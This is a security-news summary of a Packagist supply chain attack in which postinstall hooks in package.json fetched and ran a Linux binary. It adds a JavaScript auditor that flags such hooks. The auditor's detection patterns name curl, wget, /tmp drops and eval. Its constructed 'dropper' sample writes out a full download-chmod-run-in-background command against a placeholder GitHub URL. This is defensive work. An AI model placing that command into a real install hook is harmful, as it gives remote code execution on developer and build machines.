
Packagist Supply Chain Attack Infects 8 Packages Using GitHub-Hosted Linux Malware

Source: thehackernews.com | Date: 2026-05-23 | Category: AI supply chain | Severity: High

What Happened

A new "coordinated" supply chain attack campaign has impacted eight packages on Packagist, inserting malicious code designed to run a Linux binary retrieved from a GitHub Releases URL. "Although the affected packages were all Composer packages, the malicious code was not added to composer.json," Socket said. "Instead, it was inserted into package.json, targeting projects that ship JavaScript

Why It Matters

The report describes a coordinated supply chain attack on eight Packagist (Composer) packages, where attackers modified upstream repositories to add a postinstall script that downloads and executes a Linux binary from a GitHub Releases URL, storing it as /tmp/.sshd and running it in the background.[1] The malicious code was inserted into package.json rather than composer.json, targeting projects that bundle JavaScript build tooling alongside PHP code, and similar payloads were found across hundreds of GitHub files and even GitHub Actions workflows.[1] From a CyberSE.AI perspective, this highlights that AI-enabled or AI-adjacent applications built on common web stacks (PHP/JS) are exposed to the same software supply chain risks, and any AI agents or services built on these ecosystems require rigorous dependency vetting, SBOM generation, and CI/CD controls. Organizations should integrate supply chain scanning, lockfile and integrity enforcement, and GitHub/GitLab workflow hardening into their AI development lifecycle, treating build-time scripts and installer hooks as high-risk execution paths.
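The install hook described above is the point where a build host executes whatever an upstream package.json says, so the check a practitioner wants is one that inspects lifecycle scripts before npm runs them. The following is an added example, not code from the article, from Socket, or from any affected package: it parses a package.json, looks only at the hooks npm runs automatically during install, and scores the download-stage-execute chain the report describes. Every manifest in SAMPLE_MANIFESTS is constructed for this example, and the GitHub org, repo and /tmp path in the suspicious one are placeholders, not the campaign's indicators.

```javascript
// Added example (not the article's, Socket's, or any package's own code):
// audit npm lifecycle hooks in a package.json for an install-time
// "fetch a binary, stage it in /tmp, run it in the background" chain.
// All manifests below are constructed; URLs and paths are placeholders.

// Hooks npm runs on its own during `npm install`, i.e. the scripts an
// upstream compromise has to control to execute on a developer or CI host.
const LIFECYCLE_HOOKS = ['preinstall', 'install', 'postinstall', 'prepare', 'prepublish'];

// Coarse indicators. Each one alone is noisy; the combination is not.
const INDICATORS = [
  { id: 'remote-fetch',       re: /\b(curl|wget)\b/ },
  { id: 'github-release-url', re: /github\.com\/[^\s"']+\/releases\/download\//i },
  { id: 'tmp-drop',           re: /\/tmp\/\.?[\w.-]+/ },
  { id: 'chmod-exec',         re: /\bchmod\s+(\+x|[0-7]{3,4})\b/ },
  { id: 'backgrounded',       re: /(^|[^&])&\s*$|\bnohup\b|\bsetsid\b/ },
  { id: 'shell-eval',         re: /\beval\b|\b(ba)?sh\s+-c\b/ },
];

// Download plus a staging/execution indicator is the chain from the report:
// fail the build. A single indicator is worth a human look, not a block.
function severity(findings) {
  const ids = new Set(findings.flatMap((f) => f.indicators));
  const fetches = ids.has('remote-fetch') || ids.has('github-release-url');
  const stagesOrRuns = ['tmp-drop', 'chmod-exec', 'backgrounded', 'shell-eval']
    .some((id) => ids.has(id));
  if (fetches && stagesOrRuns) return 'high';
  if (ids.size > 0) return 'medium';
  return 'none';
}

// Parse a package.json text and report every lifecycle hook that trips an indicator.
function auditManifest(manifestText) {
  const pkg = JSON.parse(manifestText);
  const scripts = pkg.scripts && typeof pkg.scripts === 'object' ? pkg.scripts : {};
  const findings = [];
  for (const hook of LIFECYCLE_HOOKS) {
    const command = scripts[hook];
    if (typeof command !== 'string') continue; // hook absent or malformed: nothing to run
    const indicators = INDICATORS.filter((ind) => ind.re.test(command)).map((ind) => ind.id);
    if (indicators.length > 0) findings.push({ hook, command, indicators });
  }
  return { name: pkg.name || '(unnamed)', severity: severity(findings), findings };
}

// Constructed sample manifests (not real packages).
const SAMPLE_MANIFESTS = {
  // Ordinary front-end tooling: the postinstall hook only touches the package tree.
  benign: JSON.stringify({
    name: 'example-ui-kit',
    scripts: { build: 'vite build', postinstall: 'node ./scripts/apply-patches.js' },
  }),
  // Mirrors the pattern in the report: download a release asset, hide it under
  // /tmp, make it executable, detach it. EXAMPLE-ORG/EXAMPLE-REPO and
  // /tmp/.example-bin are placeholders.
  dropper: JSON.stringify({
    name: 'example-widget',
    scripts: {
      build: 'vite build',
      postinstall:
        'curl -fsSL https://github.com/EXAMPLE-ORG/EXAMPLE-REPO/releases/download/v1.0/asset -o /tmp/.example-bin' +
        ' && chmod +x /tmp/.example-bin && /tmp/.example-bin >/dev/null 2>&1 &',
    },
  }),
  // Network access at install time with no drop-and-run chain: review, not block.
  telemetry: JSON.stringify({
    name: 'example-cli',
    scripts: { postinstall: 'curl -s https://example.com/install-ping || true' },
  }),
};

// Run the audit over the samples and print a short report.
for (const [label, text] of Object.entries(SAMPLE_MANIFESTS)) {
  const result = auditManifest(text);
  console.log(`${label.padEnd(9)} ${result.name.padEnd(16)} severity=${result.severity}`);
  for (const f of result.findings) console.log(`  ${f.hook}: ${f.indicators.join(', ')}`);
}
```

Run as a CI step over every package.json in node_modules before any script is allowed to execute, which in practice means installing with scripts disabled first (npm honours `ignore-scripts=true` in .npmrc or `--ignore-scripts` on the command line) and re-enabling only the hooks the audit clears. Note what a lockfile does and does not give you here: integrity hashes pin the tarball you install, but when the malicious package.json was published upstream as a legitimate version, the hash matches it, so the lockfile alone never catches this class of change.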

Tags: Healthcare, Fintech, SaaS, SMB, AI startups

CyberSE Analysis

This signal maps to AI supply chain. Organizations using AI agents, LLM APIs, SaaS integrations, or sensitive data workflows should review whether this class of issue could create unauthorized tool execution, data leakage, weak approval gates, or unmanaged supply-chain exposure.

Recommended Actions

  • Restrict AI agent tool permissions and production write paths.
  • Review sensitive data access across prompts, logs, embeddings, memory, and SaaS integrations.
  • Add human approval workflows for high-impact or state-changing actions.
  • Run prompt injection and indirect prompt injection tests against affected workflows.
  • Document the owner, control gap, and remediation deadline for this risk class.

Source

https://thehackernews.com/2026/05/packagist-supply-chain-attack-infects-8.html
